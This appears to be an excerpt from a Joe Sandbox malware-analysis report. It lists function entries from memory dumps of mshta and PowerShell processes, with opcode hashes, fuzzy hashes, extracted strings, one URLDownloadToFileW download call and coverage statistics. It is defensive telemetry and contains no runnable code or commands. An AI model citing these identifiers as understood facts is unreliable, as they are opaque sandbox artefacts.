                                                                                                            Function 06D90FDF Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.1254986832.0000000006D90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d90000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction ID: c1f49a7fb7eeace4dbbe2c461bd5034c9a38766e45fbba9cbfa35d8193b0bdd2
                                                                                                            • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Function 06D90FD7 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.1254986832.0000000006D90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d90000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction ID: c1f49a7fb7eeace4dbbe2c461bd5034c9a38766e45fbba9cbfa35d8193b0bdd2
                                                                                                            • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Function 06D90FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.1254986832.0000000006D90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d90000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction ID: c1f49a7fb7eeace4dbbe2c461bd5034c9a38766e45fbba9cbfa35d8193b0bdd2
                                                                                                            • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                            • Instruction Fuzzy Hash:

                                                                                                            Executed Functions

                                                                                                            Function 04EC4B90 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1414342503.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4ec0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 759bc5b98503212e8f03dccc6bd111e54f0320a8950c73371b7a6464891b9650
                                                                                                            • Instruction ID: eb843aa3813e260393f8f4ac5ff26d736dc6e2e5bea247ed712b2ec4bca26f15
                                                                                                            • Opcode Fuzzy Hash: 759bc5b98503212e8f03dccc6bd111e54f0320a8950c73371b7a6464891b9650
                                                                                                            • Instruction Fuzzy Hash: 87223974A00219EFDB15CF98D984A9EBBB2FF88314F248159E815AB365D731ED42CF90
                                                                                                            Function 07DC1178 Relevance: 10.4, Strings: 8, Instructions: 439COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$84Oj$84Oj$84Oj$84Oj$tPq$tPq
                                                                                                            • API String ID: 0-2376529062
                                                                                                            • Opcode ID: 073f2030bae67461ad8a86d1f0f9bff397a29ca5daaea4c3217afc76c766833a
                                                                                                            • Instruction ID: c34a3609f38c8a300caabf8c52f465e847104597c4a32fa368fe670773f39f27
                                                                                                            • Opcode Fuzzy Hash: 073f2030bae67461ad8a86d1f0f9bff397a29ca5daaea4c3217afc76c766833a
                                                                                                            • Instruction Fuzzy Hash: 08F1B4B5B0021A9FDB24DB59D410B6AFBB2FFC5310F28846DE9459B381DA32EC42C791
                                                                                                            Function 07DC115B Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$84Oj$tPq
                                                                                                            • API String ID: 0-1083020389
                                                                                                            • Opcode ID: 119269b5ddda650350273ab8563047147c4a9f1e7b6baaed3405ca13a88fec10
                                                                                                            • Instruction ID: fd23151a5968d1a1d2b6c68cbc6fd1c7e1fd76c1116e785b20d05b01a9b1837f
                                                                                                            • Opcode Fuzzy Hash: 119269b5ddda650350273ab8563047147c4a9f1e7b6baaed3405ca13a88fec10
                                                                                                            • Instruction Fuzzy Hash: A691AFF4B0021ADFDB24CF48D551B69FBB2FB84210F28856DE9559B382CA32EC41CB91
                                                                                                            Function 07DC04F8 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$tPq$tPq
                                                                                                            • API String ID: 0-2376027684
                                                                                                            • Opcode ID: 08acbec4b5ef44f2307d83a13364900dee6e1f3359842cb58a315d12433b69fe
                                                                                                            • Instruction ID: 6211354713ea141d96b13a8b4553cfd22a01caf6ccc8cbfc96596ff5443cc74c
                                                                                                            • Opcode Fuzzy Hash: 08acbec4b5ef44f2307d83a13364900dee6e1f3359842cb58a315d12433b69fe
                                                                                                            • Instruction Fuzzy Hash: 5D5129B1B143169FD7249B689C10B6AFFA6EFC5710F14846EEA45DB381CA71DC02C7A1
                                                                                                            Function 04EC1A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04EC51A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1414342503.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4ec0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DownloadFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1407266417-0
                                                                                                            • Opcode ID: 7de957aa2a592f875aa5be7e854f23c0f2fed894f05c670e3f590cc6167c85ac
                                                                                                            • Instruction ID: fc02d15aa0f3e2920af53d5ee16519ab63ecb16cfab2e0bbad772ee46a625bad
                                                                                                            • Opcode Fuzzy Hash: 7de957aa2a592f875aa5be7e854f23c0f2fed894f05c670e3f590cc6167c85ac
                                                                                                            • Instruction Fuzzy Hash: 442126B1D0161AAFCB10CF99D984ADEFBB4FB48314F10812AE818A7210D374AA51CBA0
                                                                                                            Function 04DAD01D Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1413820011.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4dad000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41be6486b824e19a56c97c5afa6535b6b34bc5aef5ffc82b590d9f534668d8c2
                                                                                                            • Instruction ID: 72dd1547fa0a585fe0aceab0e8d4124332e0879ef35fe43de653a3779d51ece5
                                                                                                            • Opcode Fuzzy Hash: 41be6486b824e19a56c97c5afa6535b6b34bc5aef5ffc82b590d9f534668d8c2
                                                                                                            • Instruction Fuzzy Hash: B001F7316043409EE7204F21EC84B66BF9AEF41725F18C05ADD490B582C278A845CABA
                                                                                                            Function 04DAD005 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1413820011.0000000004DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4dad000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b5fb810332c448b8b09aa505930c8be37ae71c659674a015cd2b80f70f6a413
                                                                                                            • Instruction ID: c0d2152dbc0f39b338f16138059e1b0164190dc99510bbb0d09e72c197bedf61
                                                                                                            • Opcode Fuzzy Hash: 4b5fb810332c448b8b09aa505930c8be37ae71c659674a015cd2b80f70f6a413
                                                                                                            • Instruction Fuzzy Hash: 43015E6210E3C09FD7128B259898B56BFB5EF53224F1981DBD9888F1A3C2695849C772

                                                                                                            Non-executed Functions

                                                                                                            Function 07DC0B70 Relevance: 6.4, Strings: 5, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$X=5m$$q$$q
                                                                                                            • API String ID: 0-609386297
                                                                                                            • Opcode ID: c839a62ed76d6d4ce629b1f39fc071ef5918800f1e110af1b44ff1b79238e946
                                                                                                            • Instruction ID: 452a4c6b13580fd1aa860f75d87b1a04bf7630e3f40bea442231041fe260bc36
                                                                                                            • Opcode Fuzzy Hash: c839a62ed76d6d4ce629b1f39fc071ef5918800f1e110af1b44ff1b79238e946
                                                                                                            • Instruction Fuzzy Hash: A35105B1B0430BCFDB25CB69D8007AAFBF6AFC5214F18846ED885CB255DA31D842C792
                                                                                                            Function 07DC0808 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: e723309c52c960cd2e5ff39e4174b07f0e9a1848bd52fc6c2ce3e6e995d5e651
                                                                                                            • Instruction ID: c346e7b5ecf2d1941312e508578828ce222d6bee3209c652ff2b74609cdc7c7d
                                                                                                            • Opcode Fuzzy Hash: e723309c52c960cd2e5ff39e4174b07f0e9a1848bd52fc6c2ce3e6e995d5e651
                                                                                                            • Instruction Fuzzy Hash: 6A11D371714307DBEB34B62A9D01B66F796EFC5721F28C52EE84987280CA75C842C7D1
                                                                                                            Function 07DC007F Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1425548573.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: b3087ed6490ecd1ffc999f06b4dc055c5ed1a89ae4e7cf999082168b5774d367
                                                                                                            • Instruction ID: ccb4ea5616304b104eac97ebce9e5003852f80a6e1da2dafc04dc758039efd70
                                                                                                            • Opcode Fuzzy Hash: b3087ed6490ecd1ffc999f06b4dc055c5ed1a89ae4e7cf999082168b5774d367
                                                                                                            • Instruction Fuzzy Hash: 7F018450B0D3978FE72693646C202659FB26F83550B2F81DBD5C1EB293CD658C06C3A2

                                                                                                            Executed Functions

                                                                                                            Function 052C4C00 Relevance: .2, Instructions: 157COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72870c7eadcf1b9610454ed7506abae3a77598b4f57f3176ab8de9ce63cb4fb9
                                                                                                            • Instruction ID: d63b5580fcb8ab4071d726f4e33991f563a1ad62bbd3db55c67b785166005e3b
                                                                                                            • Opcode Fuzzy Hash: 72870c7eadcf1b9610454ed7506abae3a77598b4f57f3176ab8de9ce63cb4fb9
                                                                                                            • Instruction Fuzzy Hash: 9C518B75D1E3D15FDB13EB68997069ABFB0AF46101B0A42CBC084CF2A3D624990DC7E2
                                                                                                            Function 052C2B09 Relevance: .1, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 05f403179f13fdef2e0d3f3a2c776cc69283f4c9907491a6958e21f9e5b001a4
                                                                                                            • Instruction ID: 1f286ddaa5273fcf9c6c4321e5b8b2675da70ee5736d256e118186b890419454
                                                                                                            • Opcode Fuzzy Hash: 05f403179f13fdef2e0d3f3a2c776cc69283f4c9907491a6958e21f9e5b001a4
                                                                                                            • Instruction Fuzzy Hash: 36417C78A00205DFCB05CF58C498EAAFBB5FF48310B1182A9D8559B365CB36FC91CBA0
                                                                                                            Function 052C4BFC Relevance: .1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3747dc2a4fad8d572449227fd552e05db806e3644313446dedd92068309e7061
                                                                                                            • Instruction ID: 13b6e70ad0f0c9319545c4c885f76f94842dfcc12e84b5207d1314ac3e87ffec
                                                                                                            • Opcode Fuzzy Hash: 3747dc2a4fad8d572449227fd552e05db806e3644313446dedd92068309e7061
                                                                                                            • Instruction Fuzzy Hash: 7C11F675A006099FCB00DF99D490AAEFBB5FF89310B158599E919EB362C731ED41CBA0
                                                                                                            Function 0362D006 Relevance: .0, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303277078.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_362d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1dee16191aed047d8185b6c29b86db3e7e9d5c3759ecd8a00fde371555c46b60
                                                                                                            • Instruction ID: ac6d74fbfeb1a0a07cb93333ada4ad184f699631eb34962cf53ec83eceef22e3
                                                                                                            • Opcode Fuzzy Hash: 1dee16191aed047d8185b6c29b86db3e7e9d5c3759ecd8a00fde371555c46b60
                                                                                                            • Instruction Fuzzy Hash: 0701697200D3D09FD7128B268D94752BFA8DF43224F0984DBE8988F2A3C2689C45CB72
                                                                                                            Function 07DF1D41 Relevance: .0, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4546d90e9fc666aa8553a169f1755fefad493f401fbe0dd20cdb61d0445b3e07
                                                                                                            • Instruction ID: d39a5089529a398a2036b8b63c7ddfe87dc3e0bd67c4076dba2401b14ebf8885
                                                                                                            • Opcode Fuzzy Hash: 4546d90e9fc666aa8553a169f1755fefad493f401fbe0dd20cdb61d0445b3e07
                                                                                                            • Instruction Fuzzy Hash: F8012BB1F043245BF22966685C11B7EAB229BC0514B4A40BECB015F286CE368D0243DB
                                                                                                            Function 0362D01D Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303277078.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_362d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e0e40c184b247aa6c56c703393ee68af7996b7deb8707c35e33fac353f0db82
                                                                                                            • Instruction ID: 6c188b32b737dcd3c470d4e3b17699113a0cc4c9e0ebece5355b907003c8b55f
                                                                                                            • Opcode Fuzzy Hash: 0e0e40c184b247aa6c56c703393ee68af7996b7deb8707c35e33fac353f0db82
                                                                                                            • Instruction Fuzzy Hash: 9301F231508710AEE7208F22CD84B66FF98DF41265F08C45AEC684F292C2799886CEB6

                                                                                                            Non-executed Functions

                                                                                                            Function 07DF06B0 Relevance: 8.9, Strings: 7, Instructions: 178COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tPq$tPq$$q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-176468219
                                                                                                            • Opcode ID: 554c940db9e447d6879a6b47bd5ef3b99ef886b3e3b8c3ccd76e5ecb7f4daa53
                                                                                                            • Instruction ID: bf3f06c9802532ac3d8a3b9b7018928ff20bd458288c0257d011e102512ecea7
                                                                                                            • Opcode Fuzzy Hash: 554c940db9e447d6879a6b47bd5ef3b99ef886b3e3b8c3ccd76e5ecb7f4daa53
                                                                                                            • Instruction Fuzzy Hash: 41515E767043568FD7248A69A810676FBA5EFC5221F2A80ABDA85CB353DA31DC41C7A0
                                                                                                            Function 07DF1138 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: 0d1873550f458b5408de482e56ad8a527f774201c88ceb24bb0b8d39471c8fa2
                                                                                                            • Instruction ID: 546a6ca852a575a3de4808014c4aae98b0edfa632a01ddd93084e21c59834191
                                                                                                            • Opcode Fuzzy Hash: 0d1873550f458b5408de482e56ad8a527f774201c88ceb24bb0b8d39471c8fa2
                                                                                                            • Instruction Fuzzy Hash: 20110B7570070FD7EB34566A9801767F7A6EBC5361F29C52AEA4987380CA73D841C770
                                                                                                            Function 07DF3228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$$q
                                                                                                            • API String ID: 0-4102054182
                                                                                                            • Opcode ID: 13f32eccf141f34aaf9b9b2e4eceb26af6e666948806e48e6a75acd5d2b758d0
                                                                                                            • Instruction ID: 05c4326fbd4f28ac730137273c0730f27db0004146d4933a481910bfd234833c
                                                                                                            • Opcode Fuzzy Hash: 13f32eccf141f34aaf9b9b2e4eceb26af6e666948806e48e6a75acd5d2b758d0
                                                                                                            • Instruction Fuzzy Hash: 272108F17143065BE738666AAC11B27FBE69FC5715F27803AEB45CB281DD32D8418361
                                                                                                            Function 07DF3223 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$$q
                                                                                                            • API String ID: 0-4102054182
                                                                                                            • Opcode ID: 1c3d562c7134f5786d3ddccfcb1685284e72d7e75dd699fc1c3124a65b73d13b
                                                                                                            • Instruction ID: b14608321ce7146b22db0c98f096dd7926883b3897760d583a7d310dadf05009
                                                                                                            • Opcode Fuzzy Hash: 1c3d562c7134f5786d3ddccfcb1685284e72d7e75dd699fc1c3124a65b73d13b
                                                                                                            • Instruction Fuzzy Hash: 47214BF13103056BE634662AAC11B77FBEA9FC5315F27803AEB0587381DD31C8428361
                                                                                                            Function 07DF0308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: b649e548703411f1ab2c23b2550fc82fce861dbbf8453979670a9b1608f61b29
                                                                                                            • Instruction ID: f8a6ee74585836b6eb803b72b10648c10511321e9437fbe81d3cd49d22bfea59
                                                                                                            • Opcode Fuzzy Hash: b649e548703411f1ab2c23b2550fc82fce861dbbf8453979670a9b1608f61b29
                                                                                                            • Instruction Fuzzy Hash: 8F018452A0D3C34FD72752782820255AFB25F8352032F82DBC681CF297CA254D4687A3

                                                                                                            Executed Functions

                                                                                                            Function 0346D006 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2076719954.000000000346D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0346D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_346d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 69c4c3ae7ccebaeca608691358055069910654bb183b183d6c03c8e67d04467f
                                                                                                            • Instruction ID: 60073c67901ed8e344dd103d9f2825f5f02d3822d453857536409b2d00b1dd7b
                                                                                                            • Opcode Fuzzy Hash: 69c4c3ae7ccebaeca608691358055069910654bb183b183d6c03c8e67d04467f
                                                                                                            • Instruction Fuzzy Hash: BD01407250E3C09FD7128B258894B52BFB8DF43224F1D81DBD8888F2A3C2695849C772
                                                                                                            Function 0346D01D Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2076719954.000000000346D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0346D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_346d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 597cf239cb277bba7ba3854e8eb3a17ec3e84c317287c69fbffcf28e1db15286
                                                                                                            • Instruction ID: 0dbd5eb5112cd4007288676c7d4ed5436965f2dd37368f2cd9a1779109d375bd
                                                                                                            • Opcode Fuzzy Hash: 597cf239cb277bba7ba3854e8eb3a17ec3e84c317287c69fbffcf28e1db15286
                                                                                                            • Instruction Fuzzy Hash: 0B01FC31A047409EE7208E15CC84757FF9CDF42229F18C05BDC540F242C2789846CABB
                                                                                                            Function 04F63006 Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2078193594.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_4f60000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24e6ec682b819a0659318316016eb9051c4e50e849177bcaf2c034ba1a094cc9
                                                                                                            • Instruction ID: 149f7e0a85f0b75cc1d9aaa047e811c18e54c76a98f1ecb17ba52cc8eb87e49b
                                                                                                            • Opcode Fuzzy Hash: 24e6ec682b819a0659318316016eb9051c4e50e849177bcaf2c034ba1a094cc9
                                                                                                            • Instruction Fuzzy Hash: 34F0D435A001099FDB15CF9DD990AEEF7B1FF88324F208159E525A72A1C736EC62CB60

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:38.7%
                                                                                                            Total number of Nodes:62
                                                                                                            Total number of Limit Nodes:5
